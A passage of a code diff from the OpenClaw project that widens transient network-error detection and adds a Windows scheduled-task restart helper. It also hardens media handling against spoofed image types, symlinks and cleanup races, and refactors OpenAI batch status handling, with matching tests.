for (const code of codes) { @@ -122,6 +125,26 @@ describe("isTransientNetworkError", () => { expect(isTransientNetworkError(error)).toBe(true); }); + it("returns true for wrapped fetch-failed messages from integration clients", () => { + const error = new Error("Failed to get gateway information from Discord: fetch failed"); + expect(isTransientNetworkError(error)).toBe(true); + }); + + it("returns false for non-network fetch-failed wrappers from tools", () => { + const error = new Error("Web fetch failed (404): Not Found"); + expect(isTransientNetworkError(error)).toBe(false); + }); + + it("returns true for TLS/SSL transient message snippets", () => { + expect(isTransientNetworkError(new Error("write EPROTO 00A8B0C9:error"))).toBe(true); + expect( + isTransientNetworkError( + new Error("SSL routines:OPENSSL_internal:WRONG_VERSION_NUMBER while connecting"), + ), + ).toBe(true); + expect(isTransientNetworkError(new Error("tlsv1 alert protocol version"))).toBe(true); + }); + it("returns false for regular errors without network codes", () => { expect(isTransientNetworkError(new Error("Something went wrong"))).toBe(false); expect(isTransientNetworkError(new TypeError("Cannot read property"))).toBe(false); diff --git a/src/infra/unhandled-rejections.ts b/src/infra/unhandled-rejections.ts index 67f60d3f389..44a6bb22584 100644 --- a/src/infra/unhandled-rejections.ts +++ b/src/infra/unhandled-rejections.ts @@ -38,6 +38,9 @@ const TRANSIENT_NETWORK_CODES = new Set([ "UND_ERR_SOCKET", "UND_ERR_HEADERS_TIMEOUT", "UND_ERR_BODY_TIMEOUT", + "EPROTO", + "ERR_SSL_WRONG_VERSION_NUMBER", + "ERR_SSL_PROTOCOL_RETURNED_AN_ERROR", ]); const TRANSIENT_NETWORK_ERROR_NAMES = new Set([ @@ -49,7 +52,7 @@ const TRANSIENT_NETWORK_ERROR_NAMES = new Set([ ]); const TRANSIENT_NETWORK_MESSAGE_CODE_RE = - /\b(ECONNRESET|ECONNREFUSED|ENOTFOUND|ETIMEDOUT|ESOCKETTIMEDOUT|ECONNABORTED|EPIPE|EHOSTUNREACH|ENETUNREACH|EAI_AGAIN|UND_ERR_CONNECT_TIMEOUT|UND_ERR_DNS_RESOLVE_FAILED|UND_ERR_CONNECT|UND_ERR_SOCKET|UND_ERR_HEADERS_TIMEOUT|UND_ERR_BODY_TIMEOUT)\b/i; + /\b(ECONNRESET|ECONNREFUSED|ENOTFOUND|ETIMEDOUT|ESOCKETTIMEDOUT|ECONNABORTED|EPIPE|EHOSTUNREACH|ENETUNREACH|EAI_AGAIN|EPROTO|UND_ERR_CONNECT_TIMEOUT|UND_ERR_DNS_RESOLVE_FAILED|UND_ERR_CONNECT|UND_ERR_SOCKET|UND_ERR_HEADERS_TIMEOUT|UND_ERR_BODY_TIMEOUT)\b/i; const TRANSIENT_NETWORK_MESSAGE_SNIPPETS = [ "getaddrinfo", @@ -58,8 +61,22 @@ const TRANSIENT_NETWORK_MESSAGE_SNIPPETS = [ "network error", "network is unreachable", "temporary failure in name resolution", + "tlsv1 alert", + "ssl routines", + "packet length too long", + "write eproto", ]; +function isWrappedFetchFailedMessage(message: string): boolean { + if (message === "fetch failed") { + return true; + } + + // Keep wrapped variants (for example "...: fetch failed") while avoiding broad + // matches like "Web fetch failed (404): ..." that are not transport failures. + return /:\s*fetch failed$/.test(message); +} + function getErrorCause(err: unknown): unknown { if (!err || typeof err !== "object") { return undefined; @@ -154,10 +171,6 @@ export function isTransientNetworkError(err: unknown): boolean { return true; } - if (candidate instanceof TypeError && candidate.message === "fetch failed") { - return true; - } - if (!candidate || typeof candidate !== "object") { continue; } @@ -169,7 +182,7 @@ export function isTransientNetworkError(err: unknown): boolean { if (TRANSIENT_NETWORK_MESSAGE_CODE_RE.test(message)) { return true; } - if (message === "fetch failed") { + if (isWrappedFetchFailedMessage(message)) { return true; } if (TRANSIENT_NETWORK_MESSAGE_SNIPPETS.some((snippet) => message.includes(snippet))) { diff --git a/src/infra/windows-task-restart.test.ts b/src/infra/windows-task-restart.test.ts new file mode 100644 index 00000000000..1a25a7a7415 --- /dev/null +++ b/src/infra/windows-task-restart.test.ts @@ -0,0 +1,133 @@ +import fs from "node:fs"; +import os from "node:os"; +import path from "node:path"; +import { afterEach, describe, expect, it, vi } from "vitest"; +import { captureFullEnv } from "../test-utils/env.js"; + +const spawnMock = vi.hoisted(() => vi.fn()); +const resolvePreferredOpenClawTmpDirMock = vi.hoisted(() => vi.fn(() => os.tmpdir())); + +vi.mock("node:child_process", () => ({ + spawn: (...args: unknown[]) => spawnMock(...args), +})); +vi.mock("./tmp-openclaw-dir.js", () => ({ + resolvePreferredOpenClawTmpDir: () => resolvePreferredOpenClawTmpDirMock(), +})); + +import { relaunchGatewayScheduledTask } from "./windows-task-restart.js"; + +const envSnapshot = captureFullEnv(); +const createdScriptPaths = new Set(); +const createdTmpDirs = new Set(); + +function decodeCmdPathArg(value: string): string { + const trimmed = value.trim(); + const withoutQuotes = + trimmed.startsWith('"') && trimmed.endsWith('"') ? trimmed.slice(1, -1) : trimmed; + return withoutQuotes.replace(/\^!/g, "!").replace(/%%/g, "%"); +} + +afterEach(() => { + envSnapshot.restore(); + spawnMock.mockReset(); + resolvePreferredOpenClawTmpDirMock.mockReset(); + resolvePreferredOpenClawTmpDirMock.mockReturnValue(os.tmpdir()); + for (const scriptPath of createdScriptPaths) { + try { + fs.unlinkSync(scriptPath); + } catch { + // Best-effort cleanup for temp helper scripts created in tests. + } + } + createdScriptPaths.clear(); + for (const tmpDir of createdTmpDirs) { + try { + fs.rmSync(tmpDir, { recursive: true, force: true }); + } catch { + // Best-effort cleanup for test temp roots. + } + } + createdTmpDirs.clear(); +}); + +describe("relaunchGatewayScheduledTask", () => { + it("writes a detached schtasks relaunch helper", () => { + const unref = vi.fn(); + let seenCommandArg = ""; + spawnMock.mockImplementation((_file: string, args: string[]) => { + seenCommandArg = args[3]; + createdScriptPaths.add(decodeCmdPathArg(args[3])); + return { unref }; + }); + + const result = relaunchGatewayScheduledTask({ OPENCLAW_PROFILE: "work" }); + + expect(result).toMatchObject({ + ok: true, + method: "schtasks", + tried: expect.arrayContaining(['schtasks /Run /TN "OpenClaw Gateway (work)"']), + }); + expect(result.tried).toContain(`cmd.exe /d /s /c ${seenCommandArg}`); + expect(spawnMock).toHaveBeenCalledWith( + "cmd.exe", + ["/d", "/s", "/c", expect.any(String)], + expect.objectContaining({ + detached: true, + stdio: "ignore", + windowsHide: true, + }), + ); + expect(unref).toHaveBeenCalledOnce(); + + const scriptPath = [...createdScriptPaths][0]; + expect(scriptPath).toBeTruthy(); + const script = fs.readFileSync(scriptPath, "utf8"); + expect(script).toContain("timeout /t 1 /nobreak >nul"); + expect(script).toContain('schtasks /Run /TN "OpenClaw Gateway (work)" >nul 2>&1'); + expect(script).toContain('del "%~f0" >nul 2>&1'); + }); + + it("prefers OPENCLAW_WINDOWS_TASK_NAME overrides", () => { + spawnMock.mockImplementation((_file: string, args: string[]) => { + createdScriptPaths.add(decodeCmdPathArg(args[3])); + return { unref: vi.fn() }; + }); + + relaunchGatewayScheduledTask({ + OPENCLAW_PROFILE: "work", + OPENCLAW_WINDOWS_TASK_NAME: "OpenClaw Gateway (custom)", + }); + + const scriptPath = [...createdScriptPaths][0]; + const script = fs.readFileSync(scriptPath, "utf8"); + expect(script).toContain('schtasks /Run /TN "OpenClaw Gateway (custom)" >nul 2>&1'); + }); + + it("returns failed when the helper cannot be spawned", () => { + spawnMock.mockImplementation(() => { + throw new Error("spawn failed"); + }); + + const result = relaunchGatewayScheduledTask({ OPENCLAW_PROFILE: "work" }); + + expect(result.ok).toBe(false); + expect(result.method).toBe("schtasks"); + expect(result.detail).toContain("spawn failed"); + }); + + it("quotes the cmd /c script path when temp paths contain metacharacters", () => { + const unref = vi.fn(); + const metacharTmpDir = fs.mkdtempSync(path.join(os.tmpdir(), "openclaw&(restart)-")); + createdTmpDirs.add(metacharTmpDir); + resolvePreferredOpenClawTmpDirMock.mockReturnValue(metacharTmpDir); + spawnMock.mockReturnValue({ unref }); + + relaunchGatewayScheduledTask({ OPENCLAW_PROFILE: "work" }); + + expect(spawnMock).toHaveBeenCalledWith( + "cmd.exe", + ["/d", "/s", "/c", expect.stringMatching(/^".*&.*"$/)], + expect.any(Object), + ); + }); +}); diff --git a/src/infra/windows-task-restart.ts b/src/infra/windows-task-restart.ts new file mode 100644 index 00000000000..147a88bac41 --- /dev/null +++ b/src/infra/windows-task-restart.ts @@ -0,0 +1,72 @@ +import { spawn } from "node:child_process"; +import { randomUUID } from "node:crypto"; +import fs from "node:fs"; +import path from "node:path"; +import { quoteCmdScriptArg } from "../daemon/cmd-argv.js"; +import { resolveGatewayWindowsTaskName } from "../daemon/constants.js"; +import type { RestartAttempt } from "./restart.js"; +import { resolvePreferredOpenClawTmpDir } from "./tmp-openclaw-dir.js"; + +const TASK_RESTART_RETRY_LIMIT = 12; +const TASK_RESTART_RETRY_DELAY_SEC = 1; + +function resolveWindowsTaskName(env: NodeJS.ProcessEnv): string { + const override = env.OPENCLAW_WINDOWS_TASK_NAME?.trim(); + if (override) { + return override; + } + return resolveGatewayWindowsTaskName(env.OPENCLAW_PROFILE); +} + +function buildScheduledTaskRestartScript(taskName: string): string { + const quotedTaskName = quoteCmdScriptArg(taskName); + return [ + "@echo off", + "setlocal", + "set /a attempts=0", + ":retry", + `timeout /t ${TASK_RESTART_RETRY_DELAY_SEC} /nobreak >nul`, + "set /a attempts+=1", + `schtasks /Run /TN ${quotedTaskName} >nul 2>&1`, + "if not errorlevel 1 goto cleanup", + `if %attempts% GEQ ${TASK_RESTART_RETRY_LIMIT} goto cleanup`, + "goto retry", + ":cleanup", + 'del "%~f0" >nul 2>&1', + ].join("\r\n"); +} + +export function relaunchGatewayScheduledTask(env: NodeJS.ProcessEnv = process.env): RestartAttempt { + const taskName = resolveWindowsTaskName(env); + const scriptPath = path.join( + resolvePreferredOpenClawTmpDir(), + `openclaw-schtasks-restart-${randomUUID()}.cmd`, + ); + const quotedScriptPath = quoteCmdScriptArg(scriptPath); + try { + fs.writeFileSync(scriptPath, `${buildScheduledTaskRestartScript(taskName)}\r\n`, "utf8"); + const child = spawn("cmd.exe", ["/d", "/s", "/c", quotedScriptPath], { + detached: true, + stdio: "ignore", + windowsHide: true, + }); + child.unref(); + return { + ok: true, + method: "schtasks", + tried: [`schtasks /Run /TN "${taskName}"`, `cmd.exe /d /s /c ${quotedScriptPath}`], + }; + } catch (err) { + try { + fs.unlinkSync(scriptPath); + } catch { + // Best-effort cleanup; keep the original restart failure. + } + return { + ok: false, + method: "schtasks", + detail: err instanceof Error ? err.message : String(err), + tried: [`schtasks /Run /TN "${taskName}"`], + }; + } +} diff --git a/src/media-understanding/providers/moonshot/video.test.ts b/src/media-understanding/providers/moonshot/video.test.ts index eba98042884..f6ffb1ca957 100644 --- a/src/media-understanding/providers/moonshot/video.test.ts +++ b/src/media-understanding/providers/moonshot/video.test.ts @@ -16,7 +16,7 @@ describe("describeMoonshotVideo", () => { const result = await describeMoonshotVideo({ buffer: Buffer.from("video-bytes"), fileName: "clip.mp4", - apiKey: "moonshot-test", + apiKey: "moonshot-test", // pragma: allowlist secret timeoutMs: 1500, baseUrl: "https://api.moonshot.ai/v1/", model: "kimi-k2.5", @@ -61,7 +61,7 @@ describe("describeMoonshotVideo", () => { const result = await describeMoonshotVideo({ buffer: Buffer.from("video"), fileName: "clip.mp4", - apiKey: "moonshot-test", + apiKey: "moonshot-test", // pragma: allowlist secret timeoutMs: 1000, fetchFn, }); diff --git a/src/media-understanding/runner.auto-audio.test.ts b/src/media-understanding/runner.auto-audio.test.ts index 975f1438b46..b2e282f3666 100644 --- a/src/media-understanding/runner.auto-audio.test.ts +++ b/src/media-understanding/runner.auto-audio.test.ts @@ -120,7 +120,7 @@ describe("runCapability auto audio entries", () => { delete process.env.GROQ_API_KEY; delete process.env.DEEPGRAM_API_KEY; delete process.env.GEMINI_API_KEY; - process.env.MISTRAL_API_KEY = "mistral-test-key"; + process.env.MISTRAL_API_KEY = "mistral-test-key"; // pragma: allowlist secret let runResult: Awaited> | undefined; try { await withAudioFixture("openclaw-auto-audio-mistral", async ({ ctx, media, cache }) => { @@ -140,7 +140,7 @@ describe("runCapability auto audio entries", () => { models: { providers: { mistral: { - apiKey: "mistral-test-key", + apiKey: "mistral-test-key", // pragma: allowlist secret models: [], }, }, diff --git a/src/media-understanding/runner.proxy.test.ts b/src/media-understanding/runner.proxy.test.ts index b96f099d3cc..f05ff4a87a1 100644 --- a/src/media-understanding/runner.proxy.test.ts +++ b/src/media-understanding/runner.proxy.test.ts @@ -25,7 +25,7 @@ async function runAudioCapabilityWithFetchCapture(params: { models: { providers: { openai: { - apiKey: "test-key", + apiKey: "test-key", // pragma: allowlist secret models: [], }, }, @@ -80,7 +80,7 @@ describe("runCapability proxy fetch passthrough", () => { models: { providers: { moonshot: { - apiKey: "test-key", + apiKey: "test-key", // pragma: allowlist secret models: [], }, }, diff --git a/src/media-understanding/runner.skip-tiny-audio.test.ts b/src/media-understanding/runner.skip-tiny-audio.test.ts index 6447e2b1dbf..a4021fb52a8 100644 --- a/src/media-understanding/runner.skip-tiny-audio.test.ts +++ b/src/media-understanding/runner.skip-tiny-audio.test.ts @@ -52,7 +52,7 @@ const AUDIO_CAPABILITY_CFG = { models: { providers: { openai: { - apiKey: "test-key", + apiKey: "test-key", // pragma: allowlist secret models: [], }, }, diff --git a/src/media/input-files.fetch-guard.test.ts b/src/media/input-files.fetch-guard.test.ts index 05d59d37e76..377bbf78fa9 100644 --- a/src/media/input-files.fetch-guard.test.ts +++ b/src/media/input-files.fetch-guard.test.ts @@ -99,7 +99,9 @@ describe("HEIC input image normalization", () => { expect(release).toHaveBeenCalledTimes(1); }); - it("keeps declared MIME for non-HEIC images without sniffing", async () => { + it("keeps declared MIME for non-HEIC images after validation", async () => { + detectMimeMock.mockResolvedValueOnce("image/png"); + const image = await extractImageContentFromSource( { type: "base64", @@ -115,7 +117,7 @@ describe("HEIC input image normalization", () => { }, ); - expect(detectMimeMock).not.toHaveBeenCalled(); + expect(detectMimeMock).toHaveBeenCalledTimes(1); expect(convertHeicToJpegMock).not.toHaveBeenCalled(); expect(image).toEqual({ type: "image", @@ -123,6 +125,59 @@ describe("HEIC input image normalization", () => { mimeType: "image/png", }); }); + + it("rejects spoofed base64 images when detected bytes are not an image", async () => { + detectMimeMock.mockResolvedValueOnce("application/pdf"); + + await expect( + extractImageContentFromSource( + { + type: "base64", + data: Buffer.from("%PDF-1.4\n").toString("base64"), + mediaType: "image/png", + }, + { + allowUrl: false, + allowedMimes: new Set(["image/png", "image/jpeg"]), + maxBytes: 1024 * 1024, + maxRedirects: 0, + timeoutMs: 1, + }, + ), + ).rejects.toThrow("Unsupported image MIME type: application/pdf"); + expect(convertHeicToJpegMock).not.toHaveBeenCalled(); + }); + + it("rejects spoofed URL images when detected bytes are not an image", async () => { + const release = vi.fn(async () => {}); + fetchWithSsrFGuardMock.mockResolvedValueOnce({ + response: new Response(Buffer.from("%PDF-1.4\n"), { + status: 200, + headers: { "content-type": "image/png" }, + }), + release, + finalUrl: "https://example.com/photo.png", + }); + detectMimeMock.mockResolvedValueOnce("application/pdf"); + + await expect( + extractImageContentFromSource( + { + type: "url", + url: "https://example.com/photo.png", + }, + { + allowUrl: true, + allowedMimes: new Set(["image/png", "image/jpeg"]), + maxBytes: 1024 * 1024, + maxRedirects: 0, + timeoutMs: 1000, + }, + ), + ).rejects.toThrow("Unsupported image MIME type: application/pdf"); + expect(release).toHaveBeenCalledTimes(1); + expect(convertHeicToJpegMock).not.toHaveBeenCalled(); + }); }); describe("fetchWithGuard", () => { diff --git a/src/media/input-files.ts b/src/media/input-files.ts index b894c6d13b2..32c5998bbd9 100644 --- a/src/media/input-files.ts +++ b/src/media/input-files.ts @@ -235,11 +235,17 @@ async function normalizeInputImage(params: { limits: InputImageLimits; }): Promise { const declaredMime = normalizeMimeType(params.mimeType) ?? "application/octet-stream"; - const sourceMime = HEIC_INPUT_IMAGE_MIMES.has(declaredMime) - ? (normalizeMimeType( - await detectMime({ buffer: params.buffer, headerMime: params.mimeType }), - ) ?? declaredMime) - : declaredMime; + const detectedMime = normalizeMimeType( + await detectMime({ buffer: params.buffer, headerMime: params.mimeType }), + ); + if (declaredMime.startsWith("image/") && detectedMime && !detectedMime.startsWith("image/")) { + throw new Error(`Unsupported image MIME type: ${detectedMime}`); + } + const sourceMime = + (detectedMime && HEIC_INPUT_IMAGE_MIMES.has(detectedMime)) || + (HEIC_INPUT_IMAGE_MIMES.has(declaredMime) && !detectedMime) + ? (detectedMime ?? declaredMime) + : declaredMime; if (!params.limits.allowedMimes.has(sourceMime)) { throw new Error(`Unsupported image MIME type: ${sourceMime}`); } diff --git a/src/media/server.ts b/src/media/server.ts index b8982cb690a..a55d61919fd 100644 --- a/src/media/server.ts +++ b/src/media/server.ts @@ -96,7 +96,7 @@ export function attachMediaRoutes( // periodic cleanup setInterval(() => { - void cleanOldMedia(ttlMs); + void cleanOldMedia(ttlMs, { recursive: false }); }, ttlMs).unref(); } diff --git a/src/media/store.test.ts b/src/media/store.test.ts index 2941bf8d063..a05f907b3d3 100644 --- a/src/media/store.test.ts +++ b/src/media/store.test.ts @@ -2,7 +2,7 @@ import fs from "node:fs/promises"; import path from "node:path"; import JSZip from "jszip"; import sharp from "sharp"; -import { afterAll, beforeAll, describe, expect, it, vi } from "vitest"; +import { afterAll, afterEach, beforeAll, describe, expect, it, vi } from "vitest"; import { isPathWithinBase } from "../../test/helpers/paths.js"; import { createTempHomeEnv, type TempHomeEnv } from "../test-utils/temp-home.js"; @@ -25,6 +25,10 @@ describe("media store", () => { } }); + afterEach(() => { + vi.restoreAllMocks(); + }); + async function withTempStore( fn: (store: typeof import("./store.js"), home: string) => Promise, ): Promise { @@ -64,6 +68,33 @@ describe("media store", () => { }); }); + it("retries buffer writes when cleanup prunes the target directory", async () => { + await withTempStore(async (store) => { + const originalWriteFile = fs.writeFile.bind(fs); + let injectedEnoent = false; + vi.spyOn(fs, "writeFile").mockImplementation(async (...args) => { + const [filePath] = args; + if ( + !injectedEnoent && + typeof filePath === "string" && + filePath.includes(`${path.sep}race-buffer${path.sep}`) + ) { + injectedEnoent = true; + await fs.rm(path.dirname(filePath), { recursive: true, force: true }); + const err = new Error("missing dir") as NodeJS.ErrnoException; + err.code = "ENOENT"; + throw err; + } + return await originalWriteFile(...args); + }); + + const saved = await store.saveMediaBuffer(Buffer.from("hello"), "text/plain", "race-buffer"); + const savedStat = await fs.stat(saved.path); + expect(injectedEnoent).toBe(true); + expect(savedStat.isFile()).toBe(true); + }); + }); + it("copies local files and cleans old media", async () => { await withTempStore(async (store, home) => { const srcFile = path.join(home, "tmp-src.txt"); @@ -83,6 +114,36 @@ describe("media store", () => { }); }); + it("retries local-source writes when cleanup prunes the target directory", async () => { + await withTempStore(async (store, home) => { + const srcFile = path.join(home, "tmp-src-race.txt"); + await fs.writeFile(srcFile, "local file"); + + const originalWriteFile = fs.writeFile.bind(fs); + let injectedEnoent = false; + vi.spyOn(fs, "writeFile").mockImplementation(async (...args) => { + const [filePath] = args; + if ( + !injectedEnoent && + typeof filePath === "string" && + filePath.includes(`${path.sep}race-source${path.sep}`) + ) { + injectedEnoent = true; + await fs.rm(path.dirname(filePath), { recursive: true, force: true }); + const err = new Error("missing dir") as NodeJS.ErrnoException; + err.code = "ENOENT"; + throw err; + } + return await originalWriteFile(...args); + }); + + const saved = await store.saveMediaSource(srcFile, undefined, "race-source"); + const savedStat = await fs.stat(saved.path); + expect(injectedEnoent).toBe(true); + expect(savedStat.isFile()).toBe(true); + }); + }); + it.runIf(process.platform !== "win32")("rejects symlink sources", async () => { await withTempStore(async (store, home) => { const target = path.join(home, "sensitive.txt"); @@ -116,6 +177,97 @@ describe("media store", () => { }); }); + it("cleans old media files in nested subdirectories and preserves fresh siblings", async () => { + await withTempStore(async (store) => { + const oldNested = await store.saveMediaBuffer( + Buffer.from("old nested"), + "text/plain", + path.join("remote-cache", "session-1", "images"), + ); + const freshNested = await store.saveMediaBuffer( + Buffer.from("fresh nested"), + "text/plain", + path.join("remote-cache", "session-1", "docs"), + ); + const oldFlat = await store.saveMediaBuffer(Buffer.from("old flat"), "text/plain", "inbound"); + const past = Date.now() - 10_000; + await fs.utimes(oldNested.path, past / 1000, past / 1000); + await fs.utimes(oldFlat.path, past / 1000, past / 1000); + + await store.cleanOldMedia(1_000, { recursive: true, pruneEmptyDirs: true }); + + await expect(fs.stat(oldNested.path)).rejects.toThrow(); + await expect(fs.stat(oldFlat.path)).rejects.toThrow(); + const freshStat = await fs.stat(freshNested.path); + expect(freshStat.isFile()).toBe(true); + await expect(fs.stat(path.dirname(oldNested.path))).rejects.toThrow(); + }); + }); + + it("keeps nested remote-cache files during shallow cleanup", async () => { + await withTempStore(async (store) => { + const nested = await store.saveMediaBuffer( + Buffer.from("old nested"), + "text/plain", + path.join("remote-cache", "session-1", "images"), + ); + const past = Date.now() - 10_000; + await fs.utimes(nested.path, past / 1000, past / 1000); + + await store.cleanOldMedia(1_000); + + const stat = await fs.stat(nested.path); + expect(stat.isFile()).toBe(true); + }); + }); + + it("prunes empty directory chains after recursive cleanup", async () => { + await withTempStore(async (store) => { + const nested = await store.saveMediaBuffer( + Buffer.from("old nested"), + "text/plain", + path.join("remote-cache", "session-prune", "images"), + ); + const mediaDir = await store.ensureMediaDir(); + const sessionDir = path.dirname(path.dirname(nested.path)); + const remoteCacheDir = path.dirname(sessionDir); + const past = Date.now() - 10_000; + await fs.utimes(nested.path, past / 1000, past / 1000); + + await store.cleanOldMedia(1_000, { recursive: true, pruneEmptyDirs: true }); + + await expect(fs.stat(sessionDir)).rejects.toThrow(); + const remoteCacheStat = await fs.stat(remoteCacheDir); + const mediaStat = await fs.stat(mediaDir); + expect(remoteCacheStat.isDirectory()).toBe(true); + expect(mediaStat.isDirectory()).toBe(true); + }); + }); + + it.runIf(process.platform !== "win32")( + "does not follow symlinked top-level directories during recursive cleanup", + async () => { + await withTempStore(async (store, home) => { + const mediaDir = await store.ensureMediaDir(); + const outsideDir = path.join(home, "outside-media"); + const outsideFile = path.join(outsideDir, "old.txt"); + const symlinkPath = path.join(mediaDir, "linked-dir"); + await fs.mkdir(outsideDir, { recursive: true }); + await fs.writeFile(outsideFile, "outside"); + const past = Date.now() - 10_000; + await fs.utimes(outsideFile, past / 1000, past / 1000); + await fs.symlink(outsideDir, symlinkPath); + + await store.cleanOldMedia(1_000, { recursive: true, pruneEmptyDirs: true }); + + const outsideStat = await fs.stat(outsideFile); + const symlinkStat = await fs.lstat(symlinkPath); + expect(outsideStat.isFile()).toBe(true); + expect(symlinkStat.isSymbolicLink()).toBe(true); + }); + }, + ); + it("sets correct mime for xlsx by extension", async () => { await withTempStore(async (store, home) => { const xlsxPath = path.join(home, "sheet.xlsx"); diff --git a/src/media/store.ts b/src/media/store.ts index 9dc6f5f641b..ceb346a1f94 100644 --- a/src/media/store.ts +++ b/src/media/store.ts @@ -17,6 +17,10 @@ const DEFAULT_TTL_MS = 2 * 60 * 1000; // 2 minutes // Files are intentionally readable by non-owner UIDs so Docker sandbox containers can access // inbound media. The containing state/media directories remain 0o700, which is the trust boundary. const MEDIA_FILE_MODE = 0o644; +type CleanOldMediaOptions = { + recursive?: boolean; + pruneEmptyDirs?: boolean; +}; type RequestImpl = typeof httpRequest; type ResolvePinnedHostnameImpl = typeof resolvePinnedHostname; @@ -88,42 +92,82 @@ export async function ensureMediaDir() { return mediaDir; } -export async function cleanOldMedia(ttlMs = DEFAULT_TTL_MS) { - const mediaDir = await ensureMediaDir(); - const entries = await fs.readdir(mediaDir).catch(() => []); - const now = Date.now(); - const removeExpiredFilesInDir = async (dir: string) => { - const dirEntries = await fs.readdir(dir).catch(() => []); - await Promise.all( - dirEntries.map(async (entry) => { - const full = path.join(dir, entry); - const stat = await fs.stat(full).catch(() => null); - if (!stat || !stat.isFile()) { - return; - } - if (now - stat.mtimeMs > ttlMs) { - await fs.rm(full).catch(() => {}); - } - }), - ); - }; +function isMissingPathError(err: unknown): err is NodeJS.ErrnoException { + return err instanceof Error && "code" in err && err.code === "ENOENT"; +} - await Promise.all( - entries.map(async (file) => { - const full = path.join(mediaDir, file); - const stat = await fs.stat(full).catch(() => null); - if (!stat) { - return; +async function retryAfterRecreatingDir(dir: string, run: () => Promise): Promise { + try { + return await run(); + } catch (err) { + if (!isMissingPathError(err)) { + throw err; + } + // Recursive cleanup can prune an empty directory between mkdir and the later + // file open/write. Recreate once and retry the media write path. + await fs.mkdir(dir, { recursive: true, mode: 0o700 }); + return await run(); + } +} + +export async function cleanOldMedia(ttlMs = DEFAULT_TTL_MS, options: CleanOldMediaOptions = {}) { + const mediaDir = await ensureMediaDir(); + const now = Date.now(); + const recursive = options.recursive ?? false; + const pruneEmptyDirs = recursive && (options.pruneEmptyDirs ?? false); + + const removeExpiredFilesInDir = async (dir: string): Promise => { + const dirEntries = await fs.readdir(dir).catch(() => null); + if (!dirEntries) { + return false; + } + for (const entry of dirEntries) { + const fullPath = path.join(dir, entry); + const stat = await fs.lstat(fullPath).catch(() => null); + if (!stat || stat.isSymbolicLink()) { + continue; } if (stat.isDirectory()) { - await removeExpiredFilesInDir(full); - return; + if (recursive) { + const childIsEmpty = await removeExpiredFilesInDir(fullPath); + if (childIsEmpty) { + await fs.rmdir(fullPath).catch(() => {}); + } + } + continue; } - if (stat.isFile() && now - stat.mtimeMs > ttlMs) { - await fs.rm(full).catch(() => {}); + if (!stat.isFile()) { + continue; } - }), - ); + if (now - stat.mtimeMs > ttlMs) { + await fs.rm(fullPath, { force: true }).catch(() => {}); + } + } + if (!pruneEmptyDirs) { + return false; + } + const remainingEntries = await fs.readdir(dir).catch(() => null); + return remainingEntries !== null && remainingEntries.length === 0; + }; + + const entries = await fs.readdir(mediaDir).catch(() => []); + for (const file of entries) { + const full = path.join(mediaDir, file); + const stat = await fs.lstat(full).catch(() => null); + if (!stat || stat.isSymbolicLink()) { + continue; + } + if (stat.isDirectory()) { + const dirIsEmpty = await removeExpiredFilesInDir(full); + if (dirIsEmpty) { + await fs.rmdir(full).catch(() => {}); + } + continue; + } + if (stat.isFile() && now - stat.mtimeMs > ttlMs) { + await fs.rm(full, { force: true }).catch(() => {}); + } + } } function looksLikeUrl(src: string) { @@ -264,11 +308,13 @@ export async function saveMediaSource( const baseDir = resolveMediaDir(); const dir = subdir ? path.join(baseDir, subdir) : baseDir; await fs.mkdir(dir, { recursive: true, mode: 0o700 }); - await cleanOldMedia(); + await cleanOldMedia(DEFAULT_TTL_MS, { recursive: false }); const baseId = crypto.randomUUID(); if (looksLikeUrl(source)) { const tempDest = path.join(dir, `${baseId}.tmp`); - const { headerMime, sniffBuffer, size } = await downloadToFile(source, tempDest, headers); + const { headerMime, sniffBuffer, size } = await retryAfterRecreatingDir(dir, () => + downloadToFile(source, tempDest, headers), + ); const mime = await detectMime({ buffer: sniffBuffer, headerMime, @@ -287,7 +333,7 @@ export async function saveMediaSource( const ext = extensionForMime(mime) ?? path.extname(source); const id = ext ? `${baseId}${ext}` : baseId; const dest = path.join(dir, id); - await fs.writeFile(dest, buffer, { mode: MEDIA_FILE_MODE }); + await retryAfterRecreatingDir(dir, () => fs.writeFile(dest, buffer, { mode: MEDIA_FILE_MODE })); return { id, path: dest, size: stat.size, contentType: mime }; } catch (err) { if (err instanceof SafeOpenError) { @@ -326,6 +372,6 @@ export async function saveMediaBuffer( } const dest = path.join(dir, id); - await fs.writeFile(dest, buffer, { mode: MEDIA_FILE_MODE }); + await retryAfterRecreatingDir(dir, () => fs.writeFile(dest, buffer, { mode: MEDIA_FILE_MODE })); return { id, path: dest, size: buffer.byteLength, contentType: mime }; } diff --git a/src/memory/batch-embedding-common.ts b/src/memory/batch-embedding-common.ts index f572427ea65..2aa3351150f 100644 --- a/src/memory/batch-embedding-common.ts +++ b/src/memory/batch-embedding-common.ts @@ -1,6 +1,12 @@ export { extractBatchErrorMessage, formatUnavailableBatchError } from "./batch-error-utils.js"; export { postJsonWithRetry } from "./batch-http.js"; export { applyEmbeddingBatchOutputLine } from "./batch-output.js"; +export { + resolveBatchCompletionFromStatus, + resolveCompletedBatchResult, + throwIfBatchTerminalFailure, + type BatchCompletionResult, +} from "./batch-status.js"; export { EMBEDDING_BATCH_ENDPOINT, type EmbeddingBatchStatus, diff --git a/src/memory/batch-openai.ts b/src/memory/batch-openai.ts index 24c3b6f7eea..e17a420812c 100644 --- a/src/memory/batch-openai.ts +++ b/src/memory/batch-openai.ts @@ -7,9 +7,13 @@ import { formatUnavailableBatchError, normalizeBatchBaseUrl, postJsonWithRetry, + resolveBatchCompletionFromStatus, + resolveCompletedBatchResult, runEmbeddingBatchGroups, + throwIfBatchTerminalFailure, type EmbeddingBatchExecutionParams, type EmbeddingBatchStatus, + type BatchCompletionResult, type ProviderBatchOutputLine, uploadBatchJsonlFile, withRemoteHttpResponse, @@ -144,7 +148,7 @@ async function waitForOpenAiBatch(params: { timeoutMs: number; debug?: (message: string, data?: Record) => void; initial?: OpenAiBatchStatus; -}): Promise<{ outputFileId: string; errorFileId?: string }> { +}): Promise { const start = Date.now(); let current: OpenAiBatchStatus | undefined = params.initial; while (true) { @@ -156,21 +160,21 @@ async function waitForOpenAiBatch(params: { })); const state = status.status ?? "unknown"; if (state === "completed") { - if (!status.output_file_id) { - throw new Error(`openai batch ${params.batchId} completed without output file`); - } - return { - outputFileId: status.output_file_id, - errorFileId: status.error_file_id ?? undefined, - }; - } - if (["failed", "expired", "cancelled", "canceled"].includes(state)) { - const detail = status.error_file_id - ? await readOpenAiBatchError({ openAi: params.openAi, errorFileId: status.error_file_id }) - : undefined; - const suffix = detail ? `: ${detail}` : ""; - throw new Error(`openai batch ${params.batchId} ${state}${suffix}`); + return resolveBatchCompletionFromStatus({ + provider: "openai", + 